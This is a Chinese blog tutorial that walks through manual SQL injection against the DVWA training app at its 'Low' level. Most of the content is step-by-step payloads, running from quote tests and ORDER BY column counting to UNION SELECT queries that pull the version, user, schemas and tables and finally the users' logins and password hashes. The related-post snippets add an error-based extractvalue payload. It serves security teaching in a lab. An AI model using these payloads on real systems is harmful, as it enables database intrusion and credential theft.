DVWA-sql注入漏洞详解

最新推荐文章于 2024-06-17 17:42:40 发布
最新推荐文章于 2024-06-17 17:42:40 发布
阅读量2.1k 收藏 15
点赞数 2
分类专栏: # WEB安全 文章标签: sql 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43939527/article/details/109363453
版权

1、判断是否存在SQL注入点

DVWA安全级别为“Low”

(1)判断是否存在漏洞

Id值输入为1,发现正常显示
在这里插入图片描述
Id值输入为1’,发现报错
在这里插入图片描述

判断存在sql注入漏洞

(2)判断是否存在数字型漏洞

输入1 and 1=1 显示正常
在这里插入图片描述

输入1 and 1=2,显示仍然正常
在这里插入图片描述
故,判断不存在数字型漏洞

(3)判断是否存在字符型漏洞

输入1’ and ‘1’=’1,正常显示
在这里插入图片描述
输入1’ and ‘1’=’2,没有显示结果

在这里插入图片描述
在这里插入图片描述

故判断,此处存在一个sql注入漏洞,并且是字符型的漏洞

2、判断数据表的列数

使用order by函数,以及二分法判断列数

(1)第一步测试(10列)

输入1' order by 10 #,显示错误,故不存在10列
在这里插入图片描述

(2)第二步测试(5列)

1' order by 5 #,结果还是错误,故不存在5列
在这里插入图片描述

(3)第三步测试(3列)

1' order by 3#,还是不正确,故也不存在3列
在这里插入图片描述

(4)第四步测试(2列)

1' order by 2#

在这里插入图片描述

显示出了结果,故判断该数据表存在两列数据

3、联合查询,判断回显位置

通过order by函数判断该数据表存在两列数据
使用1' union select 1,2 #,查看两列数据是否都正常显示
在这里插入图片描述

结果判断,两列数据都能够正常显示

4、爆出MYSQL版本号、MYSQL连接用户、当前数据库、安装路径、操作系统等3个关键信息

(1)MYSQL版本号—>version()函数

1' union select version(),2 #

在这里插入图片描述
显示当前数据库版本号为5.5.65-MariaDB

(2)MYSQL连接用户—>session_user()函数

1' union select session_user(),2 #

在这里插入图片描述

显示当前数据库连接的用户为root@localhost

(3)当前数据库—>database()

1' union select database(),2 #

在这里插入图片描述

显示当前数据库名称为dvwa

(4)安装路径—>@@basedir

1' union select @@basedir,2 #

在这里插入图片描述

数据库安装路径为/usr

(5)操作系统—>@@version_compile_os

1' union select @@version_compile_os,2 #

在这里插入图片描述

操作系统为Linux

5、最终爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。

(1)数据库名称

1' union select schema_name,2 from information_schema.schemata#

在这里插入图片描述

爆出当前存在四个数据库,分别为information_schema、dvwa、mysql、performance_schema

(2)数据表名称

1' union select table_name,2 from information_schema.tables where table_schema='dvwa'#

在这里插入图片描述

爆出dvwa数据库中有两个表,分别为guestbook表和users表

(3)字段名称

1' union select column_name,2 from information_schema.columns where table_name='users'#

在这里插入图片描述

爆出users表中的字段值有user_id,first_name,last_name,user,password,avatar,last_login,failed_login这几个字段

(4)关键的字段值(比如用户名、密码等)

1' union select user,password from dvwa.users#

在这里插入图片描述

成功爆出users表中所有用户的账号和密码

桃子味奶茶
关注
  • 2
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
dvwa——sql注入
qq_45487671的博客
05-26 2592
SQL注入攻击实验 1.实验目的 (1)理解SQL注入的原理; (2)学习手工注入的过程; (3)掌握SQL注入工具的使用; (4)掌握SQL注入的防御技术。 2.实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 3.实验过程描述 1、判断是否存在SQL注入点。 id值输入1,发现正常显示 输入
DVWASQL注入
m0_67392182的博客
09-11 776
深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
DVWAsql盲注学习
weixin_43939527的博客
11-12 677
1、判断是否存在注入,注入是字符型还是数字型 DVWA安全级别为“Low” (1)判断是否存在漏洞 Id值输入为1,发现正常显示 Id值输入为1’,发现报错 判断存在sql注入漏洞 (2)判断是否存在数字型漏洞 输入1 and 1=1 显示正常 输入1 and 1=2,显示仍然正常 故,判断不存在数字型漏洞 (3)判断是否存在字符型漏洞 输入1’ and ‘1’=’1,正常显示 输入1’ and ‘1’=’2,没有显示结果 故判断,此处存在一个sql注入漏洞,并且是字符型的漏洞 2、猜解数据库名
网络安全 DVWA通关指南 SQL Injection(SQL注入)
最新发布
YueXuan_521的博客
06-17 1305
Web应用程序对用户输入的数据校验处理不严或者根本没有校验,致使用户可以拼接执行SQL命令。可能导致数据泄露或数据破坏,缺乏可审计性,甚至导致完全接管主机。布尔型盲注:根据返回页面判断条件真假时间型盲注:用页面返回时间是否增加判断是否存在注入基于错误的注入:页面会返回错误信息联合查询注入:可以使用union的情况下堆查询注入:可以同时执行多条语句使用参数化查询。数据库服务器不会把参数的内容当作SQL指令的一部分来拼接执行;而是在数据库完成SQL指令的编译后才套用参数运行(预编译)。
DVWAsql注入——联合注入和报错注入
Williamanddog的博客
12-20 1928
构造payload:1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1)))#使用格式:updatexml(xml_document,xpath_string,new_value),作用是将document的中符合string 的字符串替换为value的值。
DVWA-WEB漏洞系列之SQL注入
woo233的博客
08-09 3347
用户输入数据为 1’ and 1=1#,这时SQL语句发生变化,在原有查询完成后会判断 1=1,如果判断正确则才会有输出[#作用是注释(移除)后续SQL语句]在用户输入中依次增加order by后面的数据,当在输入为 1’ order by 3#时网页出现报错,证明该数据库有2列/字段。攻击者在HTTP请求中注入恶意的SQL代码,服务器使用参数构建数据库SQL命令时,恶意SQL被一起构造,并在数据库中执行。防御SQL注入:使用PDO,配合正确的过滤和sql语句就可避免SQL注入漏洞的产生。...
SQL注入攻击的简单示例
weixin_30888707的博客
05-22 297
SQL注入攻击的简单示例: statement := "SELECT * FROM Users WHERE Value= " + a_variable + " 上面这条语句是很普通的一条SQL语句,他主要实现的功能就是让用户输入一个员工编号然后查询处这个员工的信息。但是若这条语句被不法攻击者改装过后,就可能成为破坏数据的黑手。如攻击者在输入变量的时候,输...
SQL注入原理及DVWA实战
qq_43535990的博客
11-01 697
SQL注入原理及DVWA实战一、SQL注入原理二、测试实例三、DVWA实战 一、SQL注入原理 要理解SQL注入的原理,就必须了解能够对数据库中的信息进行增删改查的SQL语言。Sql 注入攻击就是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。当然,根据数据库版本类型的不同,相应的注入语句也有所不同,这需要我们去了解学习。 二、测试实例 需要用到的知识:PHP语言,Apache Web服务器,MySQL数据
DVWA-master.rar
03-15
1. **SQL注入**: DVWA的"SQL注入"模块允许用户通过输入框提交SQL查询,演示了不安全的参数化查询可能导致的数据泄露甚至数据库控制。 2. **跨站脚本(XSS)**: "XSS"挑战展示了反射型XSS和存储型XSS的实例,教育用户...
DVWA-master.zip
01-05
1. **SQL注入**:DVWA中的SQL注入漏洞让测试者可以构造恶意的SQL语句,获取、修改或删除数据库中的数据。通过调整输入参数,攻击者可以执行任意的数据库操作。 2. **跨站脚本(XSS)**:DVWA提供了不同类型的XSS...
DVWA亲测SQL注入漏洞
YWBOY-小忘-安全菜鸟-Web狗
08-09 568
介绍: 关于sql注入的基础知识,我上篇文章也写过了,这篇就用靶机的漏洞环境来实践操作一下,所谓实践出真理嘛,我们这次试用的漏洞平台是DVWA,Github下载地址:DVWA 关于一下注入的基本知识或者姿势,我会在实践中详解。 实验: LOW等级 先输入1看一下 我们在加个单引号 这里的搜索框为什么没有显示单引号呢?因为被url编码了 一般的url编码其实就是那个字符的ASCII值得十六进制,...
MYSQL(十):ORDER BY 详解
scofen的博客
03-25 569
1 概述 MySQL有两种方式可以实现ORDER BY: 1.通过索引扫描生成有序的结果 2.使用文件排序(filesort) 围绕着这两种排序方式,我们试着理解一下ORDER BY的执行过程以及回答一些常见的问题(下文仅讨论InnoDB存储引擎)。 2 索引扫描排序和文件排序(filesort)简介 我们知道InnoDB存储引擎以B+树作为索引的底层实现,B+树的叶子节...
dvwa详解_SQL注入--dvwa靶场--low注入详解
weixin_30438053的博客
12-17 292
1、判断是否存在注入及注入类型说明不是数字型注入,因为没有对1=2做判断 正常执行 逻辑判断为假,无输出,故为字符型使用or关键字跑出所有内容2、进一步获取信息order by 跑出字段数 1' or '1'='1 order by 3 # 时报错,说明只有两个字段使用1' union select 1,database() #获取当前数据库为dvwa如果报错MySQL SQL error: #1...
DVWA-SQL Injection(sql注入
MzHeader的博客
03-22 1560
DWVA-SQL Injection(sql注入) 介绍 SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 手工注入思路 自动化的注入神器sqlmap固然好用,但还是要掌握一些手工注入的思路,下面...
DVWASQL注入的思路
底层社会中的弱智
06-21 598
笔记 如何把两个没有关系的表结合起来 union联合查询 前面的查询字段数量要和后面的数量相同 select user,pass from mysql.user union select user from word.wp_user; 这里只有一个,使用数字充当字段 select user,pass...
dvwa系列-sql注入
一个安全研究员
05-23 2230
前言 本篇博文就不详细讲解sql注入的成因了,有兴趣的就去看看我sqlilabs的博文吧,我后面会慢慢完成sqlilabs的博文 low 我们先来判断注入点吧,用最常规的单引号试一试,报错了,初步判断应该是字符型的单引号注入。 下面就推断一下后台执行的sql语句,因为这是一个根据输入的id来查找信息的地方嘛,后台sql大概是: select id,firstname,surname ...
5、ORDER BY 关键字
未名胡的博客
08-04 1044
order by 关键字用于对结果集进行排序。 order by 关键字 order by 关键字用于对结果集按照一个列或者多个列进行排序。 order by 关键字默认按照升序对记录进行排序。如果需要按照降序对记录进行排序,您可以使用 DESC 关键字。 SELECT column_name,column_name FROM table_name ORDER BY column_
MySQL之order by原理
IT_10的博客
12-08 295
前言 表结构如下,现在从select city,name,age from t where city='西安' order by name limit 1000 ;这条语句分析下order by的原理。 CREATE TABLE `t` ( `id` INT (11) NOT NULL, `city` VARCHAR (16) NOT NULL, `name` VARCHAR (16) NO...
DVWA 1.9 SQL注入详解:新手教程与实战步骤
"这篇教程主要关注SQL注入漏洞的讲解,基于最新版本的DVWA 1.9,并提供了针对新手的教程。DVWA是一个用于安全脆弱性评估的PHP/MySQL Web应用,具有多个安全级别,包括Low、Medium、High和Impossible。文章介绍了SQL...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值